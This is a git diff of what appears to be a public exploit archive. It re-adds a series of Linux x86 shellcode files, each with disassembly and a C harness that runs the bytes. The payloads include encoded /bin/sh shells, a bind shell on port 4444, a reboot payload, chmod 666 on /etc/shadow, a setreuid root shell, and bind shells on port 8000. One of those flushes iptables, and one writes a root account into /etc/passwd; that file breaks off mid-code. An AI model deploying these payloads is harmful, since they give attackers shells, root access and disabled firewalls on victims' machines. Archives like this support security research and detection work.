+ * + * + * Disassembly of section .text: + * + * 08048060 <_start>: + * 8048060: 6a 0b push $0xb + * 8048062: 58 pop %eax + * 8048063: 99 cltd + * 8048064: 52 push %edx + * 8048065: 68 64 6f 77 6e push $0x6e776f64 + * 804806a: 89 e6 mov %esp,%esi + * 804806c: 52 push %edx + * 804806d: 68 65 74 68 30 push $0x30687465 < (eth0) you can change it for other Network card + * 8048072: 89 e1 mov %esp,%ecx + * 8048074: 52 push %edx + * 8048075: 68 6e 66 69 67 push $0x6769666e + * 804807a: 68 69 66 63 6f push $0x6f636669 + * 804807f: 68 69 6e 2f 2f push $0x2f2f6e69 + * 8048084: 68 2f 2f 73 62 push $0x62732f2f + * 8048089: 89 e3 mov %esp,%ebx + * 804808b: 52 push %edx + * 804808c: 56 push %esi + * 804808d: 51 push %ecx + * 804808e: 53 push %ebx + * 804808f: 89 e1 mov %esp,%ecx + * 8048091: cd 80 int $0x80 + * + */ + +main() +{ +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x51\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x6b\x0c\x59\x9a\x53\x69\x65\x70" + "\x78\x6f\x8a\xe7\x53\x69\x66\x75" + "\x69\x31\x8a\xe2\x53\x69\x6f\x67" + "\x6a\x68\x69\x6a\x67\x64\x70\x69" + "\x6a\x6f\x30\x30\x69\x30\x30\x74" + "\x63\x8a\xe4\x53\x57\x52\x54\x8a" + "\xe2\xce\x81"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); +} + // milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13311.c b/platforms/lin_x86/shellcode/13311.c index bd38f667b..486864335 100755 --- a/platforms/lin_x86/shellcode/13311.c +++ b/platforms/lin_x86/shellcode/13311.c 
@@ -1,59 +1,59 @@ -/* - Title: Linux x86 | Polymorphic Shellcode killall5 - 61 bytes - Author: Jonathan Salwan - Mail: submit [!] shell-storm.org - - ! DataBase of shellcode ==> http://www.shell-storm.org/shellcode/ - - - killall5 is the SystemV killall command. It sends a signal to all processes - except the processes in its own session, so it won't kill the shell that is - running the script it was called from. Its primary (only) use is in the rc - scripts found in the /etc/init.d directory. - - - Original Informations - ===================== - - Disassembly of section .text: - - 08048054 <.text>: - 8048054: 31 c0 xor %eax,%eax - 8048056: 50 push %eax - 8048057: 66 68 6c 35 pushw $0x356c - 804805b: 68 6c 6c 61 6c push $0x6c616c6c - 8048060: 68 6e 2f 6b 69 push $0x696b2f6e - 8048065: 68 2f 73 62 69 push $0x6962732f - 804806a: 89 e3 mov %esp,%ebx - 804806c: 50 push %eax - 804806d: 89 e2 mov %esp,%edx - 804806f: 53 push %ebx - 8048070: 89 e1 mov %esp,%ecx - 8048072: b0 0b mov $0xb,%al - 8048074: cd 80 int $0x80 - -*/ - -#include "stdio.h" - -int main(int argc, char *argv[]) -{ - -char shellcode[] = - - "\xeb\x11\x5e\x31\xc9\xb1\x37\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x32\xc1\x51\x67\x69\x6d\x36\x69" - "\x6d\x6d\x62\x6d\x69\x6f\x30\x6c" - "\x6a\x69\x30\x74\x63\x6a\x8a\xe4" - "\x51\x8a\xe3\x54\x8a\xe2\xb1\x0c" - "\xce\x81\x41\xce\x81"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + Title: Linux x86 | Polymorphic Shellcode killall5 - 61 bytes + Author: Jonathan Salwan + Mail: submit [!] shell-storm.org + + ! DataBase of shellcode ==> http://www.shell-storm.org/shellcode/ + + + killall5 is the SystemV killall command. It sends a signal to all processes + except the processes in its own session, so it won't kill the shell that is + running the script it was called from. Its primary (only) use is in the rc + scripts found in the /etc/init.d directory. 
+ + + Original Informations + ===================== + + Disassembly of section .text: + + 08048054 <.text>: + 8048054: 31 c0 xor %eax,%eax + 8048056: 50 push %eax + 8048057: 66 68 6c 35 pushw $0x356c + 804805b: 68 6c 6c 61 6c push $0x6c616c6c + 8048060: 68 6e 2f 6b 69 push $0x696b2f6e + 8048065: 68 2f 73 62 69 push $0x6962732f + 804806a: 89 e3 mov %esp,%ebx + 804806c: 50 push %eax + 804806d: 89 e2 mov %esp,%edx + 804806f: 53 push %ebx + 8048070: 89 e1 mov %esp,%ecx + 8048072: b0 0b mov $0xb,%al + 8048074: cd 80 int $0x80 + +*/ + +#include "stdio.h" + +int main(int argc, char *argv[]) +{ + +char shellcode[] = + + "\xeb\x11\x5e\x31\xc9\xb1\x37\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x32\xc1\x51\x67\x69\x6d\x36\x69" + "\x6d\x6d\x62\x6d\x69\x6f\x30\x6c" + "\x6a\x69\x30\x74\x63\x6a\x8a\xe4" + "\x51\x8a\xe3\x54\x8a\xe2\xb1\x0c" + "\xce\x81\x41\xce\x81"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13312.c b/platforms/lin_x86/shellcode/13312.c index 8f26d2aae..d8ea76fd0 100755 --- a/platforms/lin_x86/shellcode/13312.c +++ b/platforms/lin_x86/shellcode/13312.c 
@@ -1,48 +1,48 @@ -/* - - Title: Polymorphic Shellcode /bin/sh - 48 bytes - Author: Jonathan Salwan - Mail: submit [!] shell-storm.org - - ! DataBase of shellcode : http://www.shell-storm.org/shellcode/ - - - Original Informations - ===================== - - Disassembly of section .text: - - 08048060 <.text>: - 8048060: 31 c0 xor %eax,%eax - 8048062: 50 push %eax - 8048063: 68 2f 2f 73 68 push $0x68732f2f - 8048068: 68 2f 62 69 6e push $0x6e69622f - 804806d: 89 e3 mov %esp,%ebx - 804806f: 50 push %eax - 8048070: 53 push %ebx - 8048071: 89 e1 mov %esp,%ecx - 8048073: 99 cltd - 8048074: b0 0b mov $0xb,%al - 8048076: cd 80 int $0x80 - - -*/ - -#include "stdio.h" - -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x32\xc1\x51\x69\x30\x30\x74\x69" - "\x69\x30\x63\x6a\x6f\x8a\xe4\x51" - "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"; - -int main() -{ - printf("Polymorphic Shellcode - length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* + + Title: Polymorphic Shellcode /bin/sh - 48 bytes + Author: Jonathan Salwan + Mail: submit [!] shell-storm.org + + ! 
DataBase of shellcode : http://www.shell-storm.org/shellcode/ + + + Original Informations + ===================== + + Disassembly of section .text: + + 08048060 <.text>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: 68 2f 2f 73 68 push $0x68732f2f + 8048068: 68 2f 62 69 6e push $0x6e69622f + 804806d: 89 e3 mov %esp,%ebx + 804806f: 50 push %eax + 8048070: 53 push %ebx + 8048071: 89 e1 mov %esp,%ecx + 8048073: 99 cltd + 8048074: b0 0b mov $0xb,%al + 8048076: cd 80 int $0x80 + + +*/ + +#include "stdio.h" + +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x32\xc1\x51\x69\x30\x30\x74\x69" + "\x69\x30\x63\x6a\x6f\x8a\xe4\x51" + "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"; + +int main() +{ + printf("Polymorphic Shellcode - length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13313.c b/platforms/lin_x86/shellcode/13313.c index 4bba3666b..b65ba299f 100755 --- a/platforms/lin_x86/shellcode/13313.c +++ b/platforms/lin_x86/shellcode/13313.c 
@@ -1,133 +1,133 @@ -/* - Author: Rick - Email: rick2600@hotmail.com - - OS: Linux/x86 - Description: Port Bind 4444 ( xor-encoded ) - - --------------------------------------------------------------------- -section .text - global _start - -_start: - - ;socket (PF_INET, SOCK_STREAM, 0) - push byte 0x66 - pop eax - push byte 0x01 - pop ebx - xor ecx, ecx - push ecx - push byte 0x01 - push byte 0x02 - mov ecx, esp - int 0x80 - - mov esi, eax ;save file descriptor - - ;bind (sockfd, server, len) - xor edx, edx - push edx - push word 0x5c11 - push word 0x02 - mov ecx, esp - push byte 0x10 - push ecx - push eax - mov ecx, esp - mov bl, 0x02 - push byte 0x66 - pop eax - int 0x80 - - ;listen - mov al, 0x66 - mov bl, 0x04 - int 0x80 - - ;accept - push edx - push esi - mov ecx, esp - inc ebx - push byte 0x66 - pop eax - int 0x80 - - mov ebx, eax ;save file descriptor - - ;dup2(sockfd, 2); dup2(sockfd, 1); dup2(sockfd, 0) - push byte 0x02 - pop ecx - do_dup: - push byte 0x3f - pop eax - int 0x80 - loop do_dup - push byte 0x3f - pop eax - int 0x80 - - - ; execve ("/bin/sh", ["/bin/sh", "-i"], 0); - xor edx, edx - push edx - push 0x68732f6e - push 0x69622f2f - mov ebx, esp - push edx - push word 0x692d - mov ecx, esp - push edx - push ecx - push ebx - mov ecx, esp - push byte 0x0b - pop eax - int 0x80 - - ;exit(0) - push byte 0x01 - pop eax - xor ebx, ebx - int 0x80 --------------------------------------------------------------------- -*/ - -#include -#include - - - -char code[] = -"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" -"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" -"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" -"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" -"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" -"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" -"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" -"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" -"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" -"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" -"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" 
-"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" -"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" -"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" -"\xd3\x9e"; - - - -int main(void) -{ - printf("length: %d\n", strlen(code)); - - void (*shellcode)(); - shellcode = (void *)code; - shellcode(); - return (0); - -} - +/* + Author: Rick + Email: rick2600@hotmail.com + + OS: Linux/x86 + Description: Port Bind 4444 ( xor-encoded ) + + +-------------------------------------------------------------------- +section .text + global _start + +_start: + + ;socket (PF_INET, SOCK_STREAM, 0) + push byte 0x66 + pop eax + push byte 0x01 + pop ebx + xor ecx, ecx + push ecx + push byte 0x01 + push byte 0x02 + mov ecx, esp + int 0x80 + + mov esi, eax ;save file descriptor + + ;bind (sockfd, server, len) + xor edx, edx + push edx + push word 0x5c11 + push word 0x02 + mov ecx, esp + push byte 0x10 + push ecx + push eax + mov ecx, esp + mov bl, 0x02 + push byte 0x66 + pop eax + int 0x80 + + ;listen + mov al, 0x66 + mov bl, 0x04 + int 0x80 + + ;accept + push edx + push esi + mov ecx, esp + inc ebx + push byte 0x66 + pop eax + int 0x80 + + mov ebx, eax ;save file descriptor + + ;dup2(sockfd, 2); dup2(sockfd, 1); dup2(sockfd, 0) + push byte 0x02 + pop ecx + do_dup: + push byte 0x3f + pop eax + int 0x80 + loop do_dup + push byte 0x3f + pop eax + int 0x80 + + + ; execve ("/bin/sh", ["/bin/sh", "-i"], 0); + xor edx, edx + push edx + push 0x68732f6e + push 0x69622f2f + mov ebx, esp + push edx + push word 0x692d + mov ecx, esp + push edx + push ecx + push ebx + mov ecx, esp + push byte 0x0b + pop eax + int 0x80 + + ;exit(0) + push byte 0x01 + pop eax + xor ebx, ebx + int 0x80 +-------------------------------------------------------------------- +*/ + +#include +#include + + + +char code[] = +"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" +"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" +"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" +"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" +"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" 
+"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" +"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" +"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" +"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" +"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" +"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" +"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" +"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" +"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" +"\xd3\x9e"; + + + +int main(void) +{ + printf("length: %d\n", strlen(code)); + + void (*shellcode)(); + shellcode = (void *)code; + shellcode(); + return (0); + +} + // milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13314.c b/platforms/lin_x86/shellcode/13314.c index 8bcc8d512..10e78c58d 100755 --- a/platforms/lin_x86/shellcode/13314.c +++ b/platforms/lin_x86/shellcode/13314.c 
@@ -1,33 +1,33 @@ -/* - * Title : reboot() polymorphic shellcode - 57 bytes - * Os: Linux x86 - * - * Author: Jonathan Salwan - submit AT shell-storm.org - * Web: http://www.shell-storm.org - * - * - * !! Database of shellcodes => http://www.shell-storm.org/shellcode/ - * - */ - -#include - -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x32\xc1\x51\x69\x63\x70\x70\x75" - "\x69\x6f\x30\x73\x66\x69\x30\x74" - "\x63\x6a\x8a\xe4\x51\x8a\xe3\x54" - "\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce" - "\x81"; - - -int main() -{ - fprintf(stdout,"Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - -return 0; -} - +/* + * Title : reboot() polymorphic shellcode - 57 bytes + * Os: Linux x86 + * + * Author: Jonathan Salwan - submit AT shell-storm.org + * Web: http://www.shell-storm.org + * + * + * !! Database of shellcodes => http://www.shell-storm.org/shellcode/ + * + */ + +#include + +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x32\xc1\x51\x69\x63\x70\x70\x75" + "\x69\x6f\x30\x73\x66\x69\x30\x74" + "\x63\x6a\x8a\xe4\x51\x8a\xe3\x54" + "\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce" + "\x81"; + + +int main() +{ + fprintf(stdout,"Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + +return 0; +} + // milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13315.c b/platforms/lin_x86/shellcode/13315.c index 12ce0c757..8a9260a58 100755 --- a/platforms/lin_x86/shellcode/13315.c +++ b/platforms/lin_x86/shellcode/13315.c 
@@ -1,58 +1,58 @@ -/* -Title : Linux/x86 - Shellcode Polymorphic chmod("/etc/shadow",666) & exit() - 54 bytes -Encode : _ADD - -Author : Jonathan Salwan -Mail : submit [!] shell-storm.org - - -! Database of shellcodes => http://www.shell-storm.org/shellcode/ - - -Informations _chmod() & _exit(): -================================ - - %eax = 15 - %ebx = /etc/shadow - %ecx = 666 - - %eax = 1 - %ebx = 0 - -Disassembly of section .text: - - 08048054 <.text>: - 8048054: 51 push %ecx - 8048055: 66 b9 b6 01 mov $0x1b6,%cx - 8048059: 68 61 64 6f 77 push $0x776f6461 - 804805e: 68 63 2f 73 68 push $0x68732f63 - 8048063: 68 2f 2f 65 74 push $0x74652f2f - 8048068: 89 e3 mov %esp,%ebx - 804806a: 6a 0f push $0xf - 804806c: 58 pop %eax - 804806d: cd 80 int $0x80 - 804806f: 40 inc %eax - 8048070: cd 80 int $0x80 - -*/ - - -#include "stdio.h" - -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" - "\x6c\x0e\xff\x23\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x74\x89\xdc\xd9\x24\x8b\x84\x87" - "\x92\x9a\x8b\x86\x52\x96\x8b\x8b" - "\x52\x52\x88\x97\xac\x06\x8d\x32" - "\x7b\xf0\xa3\x63\xf0\xa3"; - -int main() -{ - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* +Title : Linux/x86 - Shellcode Polymorphic chmod("/etc/shadow",666) & exit() - 54 bytes +Encode : _ADD + +Author : Jonathan Salwan +Mail : submit [!] shell-storm.org + + +! 
Database of shellcodes => http://www.shell-storm.org/shellcode/ + + +Informations _chmod() & _exit(): +================================ + + %eax = 15 + %ebx = /etc/shadow + %ecx = 666 + + %eax = 1 + %ebx = 0 + +Disassembly of section .text: + + 08048054 <.text>: + 8048054: 51 push %ecx + 8048055: 66 b9 b6 01 mov $0x1b6,%cx + 8048059: 68 61 64 6f 77 push $0x776f6461 + 804805e: 68 63 2f 73 68 push $0x68732f63 + 8048063: 68 2f 2f 65 74 push $0x74652f2f + 8048068: 89 e3 mov %esp,%ebx + 804806a: 6a 0f push $0xf + 804806c: 58 pop %eax + 804806d: cd 80 int $0x80 + 804806f: 40 inc %eax + 8048070: cd 80 int $0x80 + +*/ + + +#include "stdio.h" + +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" + "\x6c\x0e\xff\x23\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x74\x89\xdc\xd9\x24\x8b\x84\x87" + "\x92\x9a\x8b\x86\x52\x96\x8b\x8b" + "\x52\x52\x88\x97\xac\x06\x8d\x32" + "\x7b\xf0\xa3\x63\xf0\xa3"; + +int main() +{ + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13316.c b/platforms/lin_x86/shellcode/13316.c index bb8135d47..86a6442f4 100755 --- a/platforms/lin_x86/shellcode/13316.c +++ b/platforms/lin_x86/shellcode/13316.c 
@@ -1,35 +1,35 @@ -/* - * - * linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34byte universal shellcode - * - * blue9057 root@blue9057.com - * - * / -int main() -{ - char shellcode[]="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" - "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68" - "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"; - //setreuid(geteuid(),geteuid()); - //execve("/bin/sh",0,0); - __asm__("" - "push $0x31;" - "pop %eax;" - "cltd;" - "int $0x80;" // geteuid(); - "mov %eax, %ebx;" - "mov %eax, %ecx;" - "push $0x46;" // setreuid(geteuid(),geteuid()); - "pop %eax;" - "int $0x80;" - "mov $0xb, %al;" - "push %edx;" - "push $0x68732f6e;" - "push $0x69622f2f;" - "mov %esp, %ebx;" - "mov %edx, %ecx;" - "int $0x80;" // execve("/bin/sh",0,0); - ""); -} - +/* + * + * linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34byte universal shellcode + * + * blue9057 root@blue9057.com + * + * / +int main() +{ + char shellcode[]="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" + "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68" + "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"; + //setreuid(geteuid(),geteuid()); + //execve("/bin/sh",0,0); + __asm__("" + "push $0x31;" + "pop %eax;" + "cltd;" + "int $0x80;" // geteuid(); + "mov %eax, %ebx;" + "mov %eax, %ecx;" + "push $0x46;" // setreuid(geteuid(),geteuid()); + "pop %eax;" + "int $0x80;" + "mov $0xb, %al;" + "push %edx;" + "push $0x68732f6e;" + "push $0x69622f2f;" + "mov %esp, %ebx;" + "mov %edx, %ecx;" + "int $0x80;" // execve("/bin/sh",0,0); + ""); +} + // milw0rm.com [2009-06-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13317.s b/platforms/lin_x86/shellcode/13317.s index 7ef148b22..04aa446a3 100755 --- a/platforms/lin_x86/shellcode/13317.s +++ b/platforms/lin_x86/shellcode/13317.s 
@@ -1,114 +1,114 @@ -; -; Title : Bindport TCP/8000 & execve iptables -F -; os : Linux x86 -; size : 176 bytes -; IP : localhost -; Port : 8000 -; Use : nc localhost 8000 -; -; Author : Jonathan Salwan -; Mail : submit AT shell-storm.org -; Web : http://www.shell-storm.org -; -; -; More shellcodes in => http://www.shell-storm.org/shellcode/ -; - -section .text -global _start - -_start: -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x1 -push byte 0x2 - -mov eax, 0x66 -mov ebx, 0x1 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push byte 0x0 -push word 0x401f -push word 0x2 -mov ebx, esp - -push byte 0x10 -push ebx -push edx - -mov eax, 0x66 -mov ebx, 0x2 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; -push byte 0x1 -push edx - -mov eax, 0x66 -mov ebx, 0x4 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push edx - -mov eax, 0x66 -mov ebx, 0x5 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; -mov eax, 0x3f -mov ebx, edx -mov ebx, 0x2 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x1 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; - - -;; execve(/sbin/iptables", "-F", NULL) -;; By Kris Katterjohn - -push byte 11 -pop eax -cdq -push edx -push word 0x462d -mov ecx, esp -push edx -push word 0x7365 -push 0x6c626174 -push 0x70692f6e -push 0x6962732f -mov ebx, esp -push edx -push ecx -push ebx -mov ecx, esp -int 0x80 - +; +; Title : Bindport TCP/8000 & execve iptables -F +; os : Linux x86 +; size : 176 bytes +; IP : localhost +; Port : 8000 +; Use : nc localhost 8000 +; +; Author : 
Jonathan Salwan +; Mail : submit AT shell-storm.org +; Web : http://www.shell-storm.org +; +; +; More shellcodes in => http://www.shell-storm.org/shellcode/ +; + +section .text +global _start + +_start: +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x1 +push byte 0x2 + +mov eax, 0x66 +mov ebx, 0x1 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push byte 0x0 +push word 0x401f +push word 0x2 +mov ebx, esp + +push byte 0x10 +push ebx +push edx + +mov eax, 0x66 +mov ebx, 0x2 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; +push byte 0x1 +push edx + +mov eax, 0x66 +mov ebx, 0x4 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push edx + +mov eax, 0x66 +mov ebx, 0x5 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; +mov eax, 0x3f +mov ebx, edx +mov ebx, 0x2 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x1 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; + + +;; execve(/sbin/iptables", "-F", NULL) +;; By Kris Katterjohn + +push byte 11 +pop eax +cdq +push edx +push word 0x462d +mov ecx, esp +push edx +push word 0x7365 +push 0x6c626174 +push 0x70692f6e +push 0x6962732f +mov ebx, esp +push edx +push ecx +push ebx +mov ecx, esp +int 0x80 + ; milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13318.s b/platforms/lin_x86/shellcode/13318.s index 1bba36998..2339b5743 100755 --- a/platforms/lin_x86/shellcode/13318.s +++ b/platforms/lin_x86/shellcode/13318.s 
@@ -1,137 +1,137 @@ -; -; Title : Bindport TCP/8000 & execve add user with access root -; os : Linux x86 -; size : 225+ bytes -; IP : localhost -; Port : 8000 -; Use : nc localhost 8000 -; -; Author : Jonathan Salwan -; Mail : submit AT shell-storm.org -; Web : http://www.shell-storm.org -; -; -; More shellcodes in => http://www.shell-storm.org/shellcode/ -; - -section .text -global _start - -_start: -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x1 -push byte 0x2 - -mov eax, 0x66 -mov ebx, 0x1 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push byte 0x0 -push word 0x401f -push word 0x2 -mov ebx, esp - -push byte 0x10 -push ebx -push edx - -mov eax, 0x66 -mov ebx, 0x2 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; -push byte 0x1 -push edx - -mov eax, 0x66 -mov ebx, 0x4 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push edx - -mov eax, 0x66 -mov ebx, 0x5 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; -mov eax, 0x3f -mov ebx, edx -mov ebx, 0x2 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x1 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; -push byte 0x05 -pop eax -xor ecx, ecx -push ecx -push 0x64777373 -push 0x61702f2f -push 0x6374652f -mov ebx, esp -mov cx, 02001Q -int 0x80 -;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; - -mov ebx, eax - -;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; -push byte 0x04 -pop eax -xor edx, edx -push edx - -push word 0x6873 -push 0x61622f6e -push 0x69622f3a -push 0x746f6f72 -push 
